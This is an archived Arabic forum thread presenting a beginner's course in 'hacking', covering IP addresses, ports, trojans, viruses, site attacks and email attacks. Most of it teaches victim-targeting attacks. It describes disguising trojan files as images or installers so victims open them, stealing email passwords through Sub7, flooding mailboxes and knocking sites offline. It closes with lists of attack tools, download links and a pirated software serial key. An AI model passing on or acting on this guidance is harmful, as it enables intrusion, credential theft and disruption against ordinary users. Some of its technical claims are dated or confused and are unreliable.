مشاهدة النسخة كاملة : تعلم الهكر خطوة خطوة..
linkin park
10-11-2006, 02:26 AM
هذا موضوع رائع عن الاختراق والفيروسات والبريد والهكر وكل ما يتعلق بها من مصطلحات وطرق وما الى ذلك وهو موضوع يستحق أن تستغل وقتك فيه
نبدأ الدرس الاول من سلسلة دروس Midnight Hunters لاحتراف الاختراق بدءا من الصفر حتى الاحتراف
المحتويات
----------
- تعريف الاختراق - Nuke Programs
- كيفية الاختراق - Spoofing Programs
- بعض القواعد الاساسية لاختراق - *****es
- الاي بي - Ports
- هاك الاجهزة - Port Scanner
- كيفية الاختراق باحصنة طروادة - ASM
- الاحتياجات لاختراق جهاز - Backdoor
- الفايرول (Firewall)
- 20 نصيحه للحماية - Compression
- 15 نصيحة لتكون هكر محترف - Cracker
- اختراق المواقع - ECC
- تدمير المواقع - Encryptionl
- اختراق البريد - Kernel
- تدمير البريد
- تعريف الفيروس
- كيفية الإصابة بالفيروسات
- اضرار الفيروسات
- خصائص الفيروسات
- مكونات الفيروس
- التغيرات التي تحدث عند الاصابه بالفيروس
- مراحل العدوى
- خطوات عمل الفيروس
- أنواع الفيروسات
- كيفية عمل برامج المقاومة
- اشهر الفيروسات
- كيفية الحماية من الفيروسات
- التعرف اذا تك اختراق جهازك ام لا
- الحلول لتنظيف جهازك بعد اختراقه
--------------------------------------------
ماهو الاختراق ؟
الاختراق بصفه عامه هو قدرة الفرد على الانترنت الوصول او عمل بعض العمليات بطريقة غير شرعية
سوء حصل على معلومات او دخل احد الاجهزة او المواقع ... و ذلك بالتحايل على الانظمه و الدخول فيها ..
------------------------------------------------------
كيف يتم الاختراق ؟
للاختراق طرق عديده فكل هكر يكون لنفسه اساليب خاصه به لكن في النهاية يستخدم الجميع نفس الاسس
التي تكمن الهكر من الوصول الى مبتغاه ..
بعض القواعد الاساسيه لاختراق جهاز معين ؟
يتم اختراق جهاز معين عن طريق منفذ مفتوح (Open Port) في جهاز الضحية و الذي يسمح للمخترق للدخول في الجهاز
و التحكم فيه و هذا النوع من الاختراق يسمى (Client/Server) وهو عن طريق ارسال ملف الباتش (Patch) والذي يفتح منفذ في جهاز الضحية و الذي يتسلل منه المخترق الى جهاز الضحية عن طريق البرنامج نفسه كما ان الهكرز المحترفين عندما يعرفون الاي بي الخاص بالضحية يفعلون ما يسمى بسكان على الاي بي و من ثم يستخدمون البرنامج المناسب للمنفذ او يقوقمون بعمل برامج خاصة بهم للنفاذ من منفذ معين..
كما انه يمكن للمخترق ايضا ان يخترق عن طريق النت بيوس (Net Bios) او عن طريق الدوس (Dos) و العديد من الطرق الاخرى ..
و نستطيع ان نقول ان اكثر الهكرز احترافا هم المتسليلن عن طريق ثغرات النظام ..
--------------------------------------------------------
ماهو الاي بي
------------
ينتمي لعائلة TCP/IP وهو عبارة عن بروتوكول يسمى IP (Internet Protocol)
فلكي يتواجد شخص معين على شبكة الانترنت لابد انت تكون له هويه تمثله وهذه الهويه
هي الاي بي و تكون من اربع ارقام وكل مستخدم على الشبكة له رقم لا يمكن لاخر ان يدخل به في نفس الوقت
مثل السيارة التي في الطريق كل سياره لها الرقم الخاص بها و مستحيل يكون في سياره لها نفس الرقم
و يتكون من اربع مقاطع كل مقطع يكون من 0 -----> 255
و العنونة على الشبكة تتم عن طريق تقسيم العناوين الى اربعة نطاقات
(A) (B) (C) (D)
1- فالمستخدم العادي يستخدم اي بي من نطاق D و اقصد عنوان على شكل 163.2.6.4
وذلك يعني ان الاربعة مقاطع محدده و ثابته لاتتغير .
2- اما الشركات تمتلك اي بي من نطاق C فهي تكتلك عنوان على هيئة ***,193.255.3
و مالك هذا العنوان لستطيع اعطاء اي قيمة تتراوح بين 255 ----> 0 اي انه يعطي 255 رقم مثل : -
193.255.3.1
193.255.3.2
193.255.3.3
.
.
193.255.3.255
3- نطاق B ويكون على شكل ***.***193.225
و يستطيع صاحبه اعطاء ارقام مثل : -
193.225,1,1
193.225,1,2
193.225,1,3
.
.
.
193.225,2,1
193.225,2,2
193.225,2,3
.
.
.
193.225,255.255
4- النطاق A وهو على شكل : ***.***.***124
وهذا النطاق هو الاكثر اتساعا و تستخدمه منظمات دوليه او هيئات تعمل لخدمة الانترنت على مستوى العالم .
linkin park
10-11-2006, 02:27 AM
------القسم الثانى
هاك الاجهزة ----
نوعين : -
هاك بالثغرات : موضوع طويل و معقد نوعا ما و صعب و يستخدمه الخبراء ..
هاك بالبتشات : سهل و بسيط و سريع و قوي نوعا ما و عاده ما نبدء به ..
اي برنامج باتشات في الدنيا يحتوي على 4 اشياء
1: ملف الباتش : وهو ملف يجب ارسالة للضحية و يجب على الضحية فتحه ايضا حتى يفتح
عنده منفذ (port) ثم نستطيع اختراقه ..
2: ملف Edit server : : وهو لوضع اعدادات الباتش او تغييرها ..
3 : ملف البرنامج الاساسي : وهو الذي تتصل به للضحيه و تتحكم في جهازه ..
4: ملفات ال dll و غيرها ..
و بالطبع يجب عند ارسال ملف الباتش عدم ارساله كام هو .exe بل يجب اخفائه التحايل في ارساله حيث يمكنك ارساله مدمج مع صوره او ملف تنصيب عن طريق بعض البرامج ..
و من الممكن تغير امتداد الباتش عن طريق الدوس حتى لايشك الضحيه ..
-----------------------------------------------
كيفية الاختراق عن طريق احصنة الطروادة ؟
احصنة الطروادة هو ملف الباتش الذي يرسله المخترق الى الضحية فتقوم الضحية بفتحه على انه صوره , اغنية …
ما احتياجاتي لاختراق اي واحد ؟
1: برنامج ..
2: ضحيه نرسل لها الباتش وتقوم بفتحه ..
3: ايبي الضحيه و يمكن معرفته عن طريق برامج الشات المخلفه ..
ما هو الفايرول (Firewall)
هي برامج تستخدم للحماية على الشبكة وتكون بين الجهاز و الشبكة فتمنع حدوث اي اتصال خارجي الا بأذنك .
و من اشهرها (Zone alarm , Norton Securty ..)
كيف نحمي نفسنا منهم ؟
1- عدم فتح اي ملفات مهما كانت هامة لو كنت غير متأكد انها ليست نظيفة..
2- عدم فتح اي ملفات تكون مرفقه مع الايمال لانها من الممكن ان تكون فيروسات ..(هناك برامج مخصصه لعمل سكان على الايمال للتأكد انه نظيف)
3- عدم فتح اي موقع غير متأكد انه نظيف لانه كم الممكن انه بمجرد فتح موقع يتم تحميل ملفات قد يكون بينها فايروس او باتش .. (سيتم شرح كيفية عمل موقع مثل ذلك)
4- مسح جميع الكوكيز الموجودة على الجهاز .. (سيتم شرح كيفية عمل ذلك)
5- عمل Spoof للأي بي الخاص بك عند الدخول الى الشبكة (سيتم شرح بعض البرامج التي تقوم بهذا العمل)
6- الحرص على تثبيت برامج حماية و جدران نارية Firewall على الجهاز وعمل تحديث لها بشكل دوري مثل (Zone alarm , Norton Firewall)
7- تثبيت برامج حماية من الفيروسات وعمل تحديث لها بشكل دوري مثل (Norton Anti-Virus , AVP , PC-Cillin)
8- تثبيت برامج حماية من الباتشات اوافضلهم (The Cleaner)
9- الابتعاد عن استخدام سكريبتات البرامج (******s) لانها في الغالب تكون هناك فايروسات و باتشات مصاحبة لها ..
10- هناك برامج كثيرة تفتح العديد من المنافذ عند عملها مثل (ICQ) ..
11- التأكد من ان الجهاز خالي تماما من البتشات عند الاتصال لانه لو هانك باتش بمجرد دخولك للشبكة يستطيع المخترق دخول جهازك و التحكم فيه بكل سهولة ..
12- إغلاق بعض منافذ البرامج مثل منفذ النت بيوس (Net Bios) ..
13- عدم كتابة أي ملفات على جهازك و حفظها و تكون تحتوي على بعض البيانات الخاصة بك (رقم تلفون , بطاقة اتمان) ..
14- عمل سكان على نفسك لمعرفة المنافذ المفتوحة في جهازك عن طريق بعض البرامج مثل (Super Scan , Torjan Huter) ..
15- عند الإصابة بفيروس او باتش يجب عدم الدخول إلي الشبكة و فرمته الجهاز لان هناك بعض الفيروسات تخفي نفسها او تفك و تجمع نفسها ..
16- الحرص على جعل كلمة السر ليست كلمة شهيرة و يفضل جعلها عديمة المعني و اضافة بعض الارقام و لا تقل عن 8 حروف مثل : s4d3lt6v او e4gol3s6 ..
17- ايقاف خاصية مشاركة الملفات :-
control panal / network / configuration / file and print sharring
i want to be able to give others access to my files
الغي التحديد
ثم ok
18- لا تظل مدة طويلة متصل بالشبكة بحيث لو ان واحد دخل عليك ما يظل يخرب فيك و عند خروجك و دخولك
مره اخرى للشبكة يغير اخر رقم من الايبي
19- و هذا الموقع يفحص جهازك و يخبرك بنقاط الضعف و الحلول
http://www.antionline.com/
20- لا تظل مدة طويلة متصل بالشبكة بحيث لو ان واحد دخل عليك ما يظل يخرب فيك و عند خروجك و دخولك
مره اخرى للشبكة يغير اخر رقم من الايبي
كيف تكون هكرا محترفا ؟
1- ايجادة استخدام نظام وندوز و معرفة كل شئ عنه ..
2- محاولة معرفة كل المعومات عن نظام لينوكس حتى لو لم و لن تستعمله فهو اساس اختراق المواقع ..
3- ايجاد استخدام اربع لغات برمجية على الاقل (Java , C++ , Perl , PHP) .
4- معرفة كيفية عمل نظام التشغيل و اكتشاف ثغراته و كيفية غلاقها او استخدمها ..
5- معرفة كيف تحمي جهازك حماية شبة كاملة (حيث لا توجد حماية كاملة)..
6- ايجادة اللغة الانجليزية (English is the key for the big gate of hacking).
7- لا تعتمد ابدا على انا فلان سوف يعلمك شئ لانك لان تحصل عليه كاملا ابدا و كل ما يأتي بسرعه يذهب بسرعة.
8- ليس معنى كونك هكر انت تدمر جهاز .
9- ايجادة استخدام اشهر برامج البتشات (Sub 7 , Netbus Hack attack >> ) حيث ان بعض الثغرات تسمح لك بتحميل ملفات على الضحية فيمكنك تحميل بالتش و من ثم التسلل الى جهاز الضحية .
10- معرفة كيفية استخدام ثغرات المتصفح و بعض الثغرات الاخرة الشهيره مثل النت بيوس (Net Bios) ..
11- ايجادة استخدام التلنت .
12- متابعة اخر الثغرات التي تم اكتشفها .
13- حاول ان تطور بعض الاساليب الخاصة بك .
14- ان تظل تقرأ كل ما يقابلك من ملفات .
15- لا تعتمد على القراءة في المنتديات العربية .
اختراق المواقع
هناك طرق عديدة لاختراق المواقع :-
1: استخدام الثغرات..
2: الدخول من بعض الغلاطات الموجودة في منتديات أو مجلات النيوك ..
3: برامج اللست : و هي الأطول وللمبتدأين
وتعتمد برامج اللست عل لسة كبيره تحتوي اكبر قدر ممكن من الكلمات بالاضافه إلى البرنامج الأساسي الذي يستخدم الستة في تخمين كلمة السر
الثغرات :
الثغرة الطريق لكي تكسب اعلى دخول للنظام , من الممكن ان تكون من شخص غير مصرح الى مشرك بسيط
او من مشترك بسيط الى مدير النظام , و هي تشتمل ايضا على تحطيم السرفرات .
و اغلب انواع الثغرات مكتوبة بلغة C .
وهي اقوى الطرق لاختراق المواقع و هي الاعقد و نستطيع ان نقول ان معظم الثغرات تستخدم للحصول على الروت و تكون انت مدير نظام الجهاز الذي تريد اختراقه او الموقع او السرفر ...
و الثغرات تعتبر ملفات التي تسمح لك بالدخول عن طريق HTTP , و تستطيع استخدام برامج السكان للحصول على ثغرات الموقع و هناك العديد من الثغرات و التي تتيح لك العديد من الاشياء مثل : -
1- قراءة ملفات .
2- مسح و اضافة ملفات .
3- روت .
و العديد ..
و الثغرة اصلا عبارة عن خطأ برمجي يستطيع منه المخترق التسسل الى جهازك و كل ثغره عبارة عن كود معين (وليس عن برنامج كما يعتقد الكثير)
و يجب استخدام احد برامج السكان مثل (CGIscan او Shadow.. ) لمعرفة ثغرات المواقع و من ثم الذهاب الى موقع يقدم لك شرح و معلومات عن هذه الثغرة .
انواع الثغرات
NT : Uni code , bofferoverfollow , tftp
UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel exploits, rootkits, ProFTPD, WU-FTPD, X
Win 2000 : Uni code , bofferoverfollow , null session في نظم ميكروسوفت ,
Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , ProFTPD, WU-FTPD, Kernel Exploits, rootkits, X
ماهو Bufferoverflow
شبيها بهجمات الدوس و التي تحمل السرفر حمولة ذائدة و تستخدم لايقاف خدمة معينة مثل (ftp , pop , smtp..)
فمن الممكن الهجوم بها على سرفر اف تي بي و سحب البسوردات منه ..
تدمير المواقع
وهي عن طريق برامج البنج وهي التي تبطئ الموقع و تثقله حتى يتوقف وتكون اما عن طريق الدوس أو برامج معينه مثل evil ping و برنامج الدرة , كما انه مجرد الدخول إلى موقع و فتح أي صفحة بها صور يثقل عمل الموقع أو عمل بحث في الموقع ..
اختراق البريد
عدد لانهائي من الطرق و الحيل
ولكنه صعب جدا جدا جدا
ومن اسهلها ان تخترق جهاز الضحيه بالسب سفن وتذهب الى قائمه الباسووردات المحفوضه ( اذا كان حافض الباس وورد راح تلقاها مع اسم بريده)
تدمير و تفجير البريد
وهو سهل و بسيط عن طريق إغراق البريد بإرسال حتى يتوقف و هناك برامج تسهل تلك العملية
Nuke Programs
وهي برامج تقوم بفصل صاحب الايبي من الاتصال
Spoofing Programs
وهي تغير الايبي الى رقم آخر و يستفاد منها في الاختراق و بعد الأوقات تتوقف عليها , كما انه يمكن ان نستخدمها في الحماية فعند الدخول الانترنت تعمل سبوف على الاي بي الخاص بك فلا يستطيع احد الوصول الى جهازك غالبا ..
*****es
هي عبارة عن ملفات يرسلها الموقع لمتصفحك و هي عباره عن ملف مكتوب لا يستطيع أي
موقع قر ائته غير هذا الموقع و قد يكون به كلمات سر موقع أو اشتراك ...
وهي مزعجه في بعض الأحيان حيث أنها مثلا تسجل كل المواقع التي دخلتها و كل الصفحات
التي شاهدتها و مدة مشاهدة كل صفحه ....
ويمكن مسح الكوكيز عن طريق الذهاب المجلد الخاص بها و حذف الملفات التي به C:\WINDOWS\*****es و حذف الملفات التي توجد داخل هذا المجلد
Ports
وهي المنافذ التي يتسلل منها الهكرز لجهازك و من ثم التحكم فيه ..
Port Scanner
وهي برامج تفحص المنافذ المفتوحة لديك و تخبرك بها و تغلقها ..
مثل (Super Scan , Torjan Hunter)
ASM (كود الأسمبلي)
هو تمثيل رمزي للغة الأله لجهاز كمبيوتر محدد, يتم تحويل كود الأسمبلي الي لغة الآله عن طريق مجمع .
البرمجة بلغة الأسمبلي بطيئة و تولد الكثير من الأخطاء و لكنها الطريقة الوحيدة لعرض كل أخر bit من الأداء من الهاردوير
الباك دوور
هو عبارة عن ثغرة في النظام الأمني متواجدة عمدا من قبل المصمم أو من قبل شخص أخر قام باحداث الثغرة عمدا . ليس من الشرط أن يكون الدافع لوجود كل ثغرة هو الأذيه
Cipher
هو النص الذي تم تشفيرة بواسطة نظام للتشفير .التشفير هو أي اجرء يستخدم في الكتابه السرية لتحويل النصوص العادية الي نصوص مشفرة لمنع أي أحد من قراءة هذه البيانات
الي الشخص المقصود وصول البيانات اليه .
Compression
هو عمليه حسابيه لتقليل عدد البايتس المطلوبة لتحديد كمية من البيانات عادة هو ترتيب البيكسل .
Cracker
هو الشخص الذي يحاول الحصول علي دخول غير مرخص لجهاز كمبيوتر هؤلاء الاشخاص غالبا خبثاء و لديهم العديد من الطرق للدخول الي النظام.
لقد عرف هذا المصطلح عام 1985 من قبل الهاكرز دفاعاَ ضد استخدام الصحافة السيء لكلمة هاكر .
ECC = Error checking and correction
أو فحص الأخطاء و تصحيحها هو مجموعة من الطرق لتتبع الأخطاء في البيانات المرسله أو المخزنة و تصحيحها .
يتم عمل هذا بعدة طرق و كلها تدخل بعض من أشكال التشفيرأبسط أشكال تتبع الأخطاء هو اضافة بايت التعادل أو بالفحص الدوري المتزايد
ليس فقط بمقدور البايت المتعادل أن يقوم بتتبع الأخطاء التي حدثت بل يستطيع تحديد أي بايت تم عكسها و هل يجب اعادة عكسها استعادة البيانات
الأصليه .
كلما زاد عدد البايتس المضافة كلما زادت فرصة تعقب الأخطاء و تصحيحها
Encryptionl
هو أي اجراء يستعمل في الكتابه السرية لتحويل النصوص العاديةالي نصوص مشفرة و ذلك حتي لا يتمكن أي أحد من قراءة تلك البيانات
ما عدا الشخص المقصود وصول البيانات اليه .
هناك العديد من أنواع تشفير البيانات و هذه الانواع هي قواعد أمن الشبكة .
Kernel
هو الجزء الرئيسي في اليونكس أو في أي نظام تشغيل و هو المسئول عن تخصيص المصادر و الأمن و خلافه
linkin park
10-11-2006, 02:28 AM
الفيروسات
وهي من اخطر الأشياء على الجهاز
ما هو الفيروس ؟
هو برنامج مكتوب باحدي لغات البرمجة يستطيع التحكم في برامج الجهاز و اتلفها و تعطيل عمل الجهاز كله و تستطيع نسخ نفسها
كيف تحدث الإصابة بالفيروسات ؟
يتنقل الفيروس إلى جهازك عندما تقوم بنقل ملف ملوث بالفيروس إلى جهازك و ينشط الفيروس عند محاولة
فتح ذلك الملف و قد يصل ذلك الفيروس من عدة أشياء لك منها انك قد نزلت ملف عليه فيروس من الإنترنت
او قد وصلك على البريد على هيئة Attachment وو ..
الفيروس عبارة عن برنامج صغير و ليس من شرطا أن يكون للتخريب فمثلا هناك فيروس صممه أحد الفلسطينيين
يفتح لك واجهه و يبين بعض الشهداء الفلسطنين و يعطيك بعض المواقع عن فلسطين ...
ويمكن عمل هذا الفيروس بطرق كثيره و بسيطة حيث انك يمكن تصميمه بلغات البرمجة أو حتى باستخدام Notpad
اضرار الفيروسات :-
1- انشاء بعض الباد سيكتورس (Bad Sectors) والتي تتلف جزء من الهارد الخاص بك مما يمنعك من استخدام جزء منه ..
2- ابطاء عمل الجهاز بصوره ملحوظة ..
3- تدمير بعض الملفات ..
4- تخريب عمل بعض البرامج و قد تكون هذه البرامج مثل الحماية من الفيروسات مما يشكل خطر رهيب ..
5- اتلاف بعض اجزاء الجهاز (Bios) و الذي قد يجعلك تتضطر الى تغير المز بروت (Mother Board) و الكروت كلها ..
6- قد تفاجأ بختفاء سيكتور من الهارد ..
7- عدم التحكم في بعض الجزاء الجهاز ..
8- انهيار نظام التشغيل ..
9- توقف عمل الجهاز بصوره كاملة ..
--------------------------------------------------------------------------
خصائص الفيروسات
1- نسخ نفهسا و الانتشار في الجهاز كله ..
2- التغير في بعض البرامج المصابة مثل اضافة مقطع الى ملفاتا لنوت باد في الاخر ..
3- فك و تجميع نفسها و الاختفاء ..
4- فتح منفذ ما في الجهاز او تعطيل عمل بعض الاجزاء فيه ..
5- يضع علامة مميزه على البرامج المصابة تسمى (Virus Mark)
6- البرنامج المصاي بالفيروس بصيب البرامج الاخرى عن طريق وضع نسخه من الفيروس بها ..
7- البرامج المصابة من الممكن ان تعمل عليها دون الشعور بأي خلل فيها لفتره ..
--------------------------------------------------------------------------
مما يتكون الفيروس؟
1- برنامج فرعي ليصيب البرامج التنفيذية ..
2- برنامج فرعي لبدء عمل الفيروس ..
3- برنامج فرعي لبدء التخريب ..
ماذا يحذث عند الاصابة بفيروس ؟
1- عند فتح برنامج مصاب بالفيروس يبدء الفيروس بالتحكم في الجهاز و يبدء بالبحث عن ملفات ذات امداد .exe او .com او .bat .. حسب الفيروس و ينسخ نفسه بها..
2- عمل علامة خاصة في البرنامج المصاب (Virus Marker) و تختلف من فيروس لاخر ..
3- يقوم الفيروس بالحث عن البرامج و فحص اذا كانت بها العلامه الخاصة به ام لا و اذا كانت غير مصابه ينسخ نفسه بها ..
4- اذا وجد علامته يكمل البحث في باقي البرامج و يصيب كل البرامج ..
ما هي مراحل العدوى ؟
=====================
1- مرحلة الكمون : حيث يختبأ الفيروس في الجهاز لفترة ..
2- مرحلة الانتشار : و يبدء الفيورس في نسخ نفسه و الاتشار في البرامج و اصبتها و ووضع علامته فيها ..
3- مرحلة جذب الذناد: و هي مرحلة الانفجار في تاريخ معين او يوم .. مثل فيروس تشرنوبيل ..
4- مرحلة الاضرار : و يتم فيها تخريب الجهاز ..
خطوات عمل الفيروس :-
تختلف طريقة العدوى من فايروس لاخر و من نوع لاخر و هذا شرح مختصر لكيفية عمل الفيروسات : -
1- تحدث العدوى لبرنامج تنفيذي و لن تشعر باي تغيير فيه .
2- عندما يبدأ البرنامج المصاب بالعمل يبدا نشاط الفيروس كما يلي : -
أ- ينفذ البرنامج الفعي الخاص بالبحث , فيبحث الفيروس عن البرامج ذات الامتداد .exe او .com او .. و ان واجد اي منها يحضر جدزء صغير من
بداية البرنامج الى الذاكرة و من ثم يبحث عن علامته فان وجدها ترج البرنامج و بحث عن غيره و اذا لم يجدها يضعها في اول البرنامج .
ب- بعد ذلك تكون حدثت العدوى فتحدث عملة التخريب التي تسبب الاخطاء عند عمل البرنامج المصاب .
3- بعد ذلك يعود التحكم للبرنامج مره اخرى (بعد ان كان الفيروس يتحكم فيه) ليبدو انه يعمل بصورة طبيعية .
4- بعد ذلم تكون عملية العدوى انتهت يتم التخلص من الفيروس الموجود في الملف التنفيذي الاول حيث ان الفيروس قد انتشر في البرامج الاخرى .
أنواع الفيروسات
================
1: فيروسات قطاع التشغيل (Boot Sector Virus)
وهو الذي ينشط في منطقة نظام التشغيل وهو من اخطر أنواع الفيروسات حيث انه يمنعك من تشغيل الجهاز
2: فيروسات الماكرو (Macro Virus)
وهي من اكثر الفيروسات انتشارا حيث انها تضرب برامج الاوفيس و كما أنها تكتب بالورد او Notpad
3: فيروسات الملفات (File Virus)
وهي تنتشر في الملفات وعند فتح أي ملف يزيد انتشارها ..
4: الفيروسات المخفية (Steath Virus)
وهي التي تحاول آن تختبئ من البرامج المضادة للفيروسات و لكن سهل الإمساك بها
5: الفيروسات المتحولة (Polymorphic virus)
وهي الأصعب على برامج المقاومة حيث انه صعب الإمساك بها وتتغير من جهاز إلي آخر في أوامرها ..
ولكن مكتوبة بمستوى غير تقني فيسهل إزالتها
6: فيروسات متعددة الملفات (Multipartite Virus)
تصيب ملفات قطاع التشغيل و سريعة الانتشار ..
7: فيروسات الدودة (Worm)
وهو عبارة عن برنامج ينسخ نفسه على الاجهزه و يأتي من خلال الشبكة و ينسخ نفسه بالجهاز عدة مرات
حتى يبطئ الجهاز وهو مصمم لإبطاء الشبكات لا الأجهزة
و بعض الناس تقول امه هذا النوع لايعتبر فيروس حيث انه مصمم للإبطاء لا لأزاله الملفات و تخريبها ..
8: الباتشات (Trojans)
وهو أيضا عبارة عن برنامج صغير قد يكون مدمج مع ملف آخر للتخفي عندما ينزله شخص و يفتحه يصيب
ال Registry و يفتح عندك منافذ مما يجعل جهازك قابل للاختراق بسهوله و هو يعتبر من أذكى البرامج
فمثلا عند عمل سكان هناك بعض التورجن يفك نفسه على هيئة ملفات غير محدده فيمر عليها السكان دون التعرف علية
و من ثم يجمع نفسه مره ثانيه
برامج المقاومة
كيف تعمل ؟
هناك طريقتان في البحث عن الفيورسات
1: عندما يكون الفيروس معروف من قبل فتبحث عن التغير المعروف لها مسبقا الذي يسببه ذلك الفيروس
2: عندما يكون الفيروس جديد فتبحث عن شئ غير طبيعي في الجهاز حتى تجده و تعرف أي برنامج مسبب له
و توقفه
ودائما و غالبا تظهر نسخ عديده من الفيورس و لها نفس التخريب مع فروق بسيطة
اشهر الفيروسات
--------------
اشهر الفيروسات على الإطلاق هو شيرنوبل و مالسيا و فيروس الحب Love ..
هل جهازك مخترق ؟
-----------------
Start ---> Run ----> System.iniأذهب الى التالي:
star--->run--->win.ini
وابحث عن القيم التالية
run=xxx.exe أو run=xxx.dll أو load=xxx.exe أو load=xxx.exe
مع ملاحظة ان xxx هو اسم الخادم أو السيرفر.وإذا عثرت على اي قيمة منها فقم بحذفها.
Start ---> Run ----> System.ini
أذهب للسطر الخامس
لو كان :-
User.exe=User.exe
جهازك سليم
أما لو وجدته :-
User.exe=User.exe*** *** ***
إذن جهازك تم اختراقه
تم اختراق جهازي ماذا افعل ؟؟
فرمت الجهاز و ريح نفسك لام هناك بعض الباتشات التي تفك و تركب نفسها
اما اذا أردت انا لا تفرمت الجهاز
اذ1 عليك ان تنزل برنامج The Cleaner و Zone alarm
الاول تعمل به سكان للجهاز لكشف الباتشات و ازالتها
و الثاني فيرول للحمايه
و نزل انتي فايروس و اعمل به سكان أيضا
أيهما افضل لكشف ملفات الباتشات هل هي البرامج المتخصصة لذلك ام الانتي فايروس؟
الانتي فايروس لانه الاكثر انتشارا و يتم تحديثه بسرعه اكبر من اي شئ اخر
فاذا تم ظهور اي باتش جديد بعد ثلاث ساعات مثلا تكون الشركه قد جهزت له المضاد
كيف احمي نفسي؟
--------------
1: التأكد من نظافة الملفات قبل فتحها مثل exe لانها ملفات تشغيليه واذا ارسلك واحد شي وهو ماهو برنامج وامتداده exe معناه ممكن يكون فيروس
2: عمل سكان كامل على الجهاز كل ثلاث ايام
3: التأكد من تحديث الانتي فايروس كل اسبوع على الاقل (شركة نورتون تطرح تحديث كل يوم او يومين)
4: وضع Firewall جيد
5: وضح Anti-Virus جيد
6: ايقاف خاصية مشاركة الملفات :-
control panal / network / configuration / file and print sharring
i want to be able to give others access to my files
الغي التحديد
ثم ok
7: لا تظل مدة طويلة متصل بالشبكة بحيث لو ان واحد دخل عليك ما يظل يخرب فيك و عند خروجك و دخولك
مره اخرى للشبكة يغير اخر رقم من الايبي
8: و هذا الموقع يفحص جهازك و يخبرك بنقاط الضعف و الحلول
http://www.antionline.com/
9: لا تخزن كلمات المرور او كلمات اسر على جهازك (مثل كلمة المرور لاشتراكك في الانترنت او البريد الكتروني او ...)
10: لا تفتح اي ملفات تكون وصلة على بريدك الا بعد التأكد من نظافتها ..
11: اذا لاحظت حدوث اي شئ غريب مثل خلل في اي برامج او خروج و دخول السي دي افصل الاتصال فورا و تأكد من نظافة الجهاز
linkin park
10-11-2006, 02:38 AM
افضل البرامج
-------------
برامج الهاك
============
برامج هاك الاجهزه
-----------------
Sub 7 , Bo2k , Netbus , net devil.dos,,lithium , nova, executer,وغيره من الكثير unicode,tafek,vampire,ftp,winshell
والافضل Bo2k ولكن الاكثر انتشارا Sub7
بالنسبة لي انا لا احبذ البرامج احب الأختراق عن طريق الثغرات ولك للبرامج اهميتها بعض الشىء
برامج تدمير البريد
------------------
Aenima , Kaboom , euthan , emailbomber , Death & Destruction Email Bomber v4.0 -
Aenima الافضل و الاسرع
aenima_V20
haktek
Euthan V1.5
Death & Destruction Email Bomber v4.0
Bounce Spam Mail V1.4
AnonyMail
================================================== ===========================================
برامج اكتشاف ثغرات المواقع
---------------------------
Voideye , Shadow Scan Security (SSS)
والافضل SSS وهو يعتبر مكتبة برامج هاك متكامله و سنتكلم عنه لاحقا
Shadow Scan Security V.3.7
Crack V.3.7
[url="http://www.devil2k.com/download/SS2.7.exe"Shadow Scan Security V.2.7[/url]
Crack V.2.7
Voideye V.1
Voideye V.2
============================BlAcK_WoLf============ =============================
برامج اللسته (للبريد و المواقع)
-------------------------------
wwwhack , webcracker , MungaBunga
الاقضل MungaBunga
Brut us A2
GoldenEye V1.0
================================================== ===========================================
برامج الحماية (فير وول)
------------------------
Zone alarm , Tiny Personal Firewall 2.0.14 , Noewtach وBlackICE Defender v2.5 co
الافضل Zone alarm
Norton Internet Security 2001 v 2.5 Family Edition
Tiny Personal Firewall 2.0.14
Zone alarm
S/N dk68s-vfgfv-wh0jt-wnm68g-kx0w00
LOCKDOWN Millennium V8.1.1
LOCKDOWN Millennium V8.1.1
Intruder Alert '99
================================================== ===========================================
برامج مقاومة الفيروسات
-----------------------
Norton Anti-Virus , Mcafee , Pc-cillin
عندما يكون عدد الفيروسات مبير افضل Pc-cillin اما اذا عدد قليل Norton الافضل
AntiViral Toolkit Pro (AVP) Gold
AntiViral
[url="http://202.101.237.103/f/jwjjt/soft6/nav751ce.zip"]Norton Anti-Virus 2001
Cleaner V.3.2
================================================== ===========================================
برامج البنج
------------
evil ping
Dorrah
================================================== ===========================================
برامج Spoofing
---------------
DC Internet Services Pack
Windows Spoofer 97
================================================== ===========================================
*******
--------
****** Crusher v2.6
================================================== ===========================================
Port Scanner
------------
Sphere
Netscan
Superscan
netspyhunter
wgatescan
HeMSCaN v1.1
FastScan v2.0
FTP Scan
================================================== ===========
Nukes
------
60 برنامج نيوك في ملف واحد
nsnuke
nukeit
X-flood
Win nuke V.4
Click V.2.2
Die V.3
Bs
Icmp
Superkod
Winbnc
================================================== ===========================================
اختراق المواقع
---------------
WebCrack V.4
Unsecure
كاشف كلمات السر
----------------
Ratcracker1.40
ويستخدم لكشف كلمات السر الموضوعه على الباتشات
ملفات ال dll
--------------
مكتبة ملفات dll
40 ملف dll في ملف واحد مضغوط
================================================== ===========================================
كراك و سريال
-------------
كل ما تريد من كراك او سريال
================================================== ===========================================
افضل عشر مواقع هاك
-------------------
1 : http://www.devil2k.com
2 : www.smarthack.com
3 : http://thenewbiesarea.wd1.net
4 : http://www.astalavista.com
5 : www.arabshacker.com
6 : www.tlsecurity.net
7 : www.ahliz.org
8 : www.flashyat.ne
9 : www.7lem.com
10: www.kwakeb.net
وفي النهاية احب ان اوضح لكم شيىء والكثير من الهاكرز بعالمنا العرب او المبتدأين يجهلونه لكن تكون هاكر يجب ان تكون على علم بما يلي :
1:ان تكون ملما بللغة الأنجليزية.
2:ان تكون ملما بمعظم انظمة التشغيل وخاصة اليونكس واللينكس والتى لا غنى عنها بأختراق المواقع.
3:ان تكون ملما بأوامر ال regestry
4:ان تكون ملما على الأقل بأربع لغات برمجة كلغة php او visual basic او جافا و perl وغيرها..
5:ان تتابع اخر اخبار الثغرات.
6:ان تتابع المواقع الغربية لأن المواقع العربية لما تصل سوا لاى 10% مما توصل له الغرب..
8: يجي ان تعلم ان الهاك 80% مخ وذكاء و10 % برامج
9:ان تكون ملما بال ftp وال telnet وال Dosلأن الهاك بدأ منها وهي اقوى من البرامج واستخدامها لا يضر بجهازك بعكس البرامج الجاهزة اللي لا تعلم ماذا يكون مدموج فيها..
10:يجي ان تعلم ان اختراق الأجهزة والأيميلات اصبحت من العاب الأطفال يجي ان تتجه الى اختراق المواقع واليرفرات والشبكات..
عندما تتطبق السابق يمكن ان تقول عن نفسك ان هاكر
linkin park
10-11-2006, 02:39 AM
منوعات للاختراق
اختراق المواقع ---------------
موضوع أيضا طويل
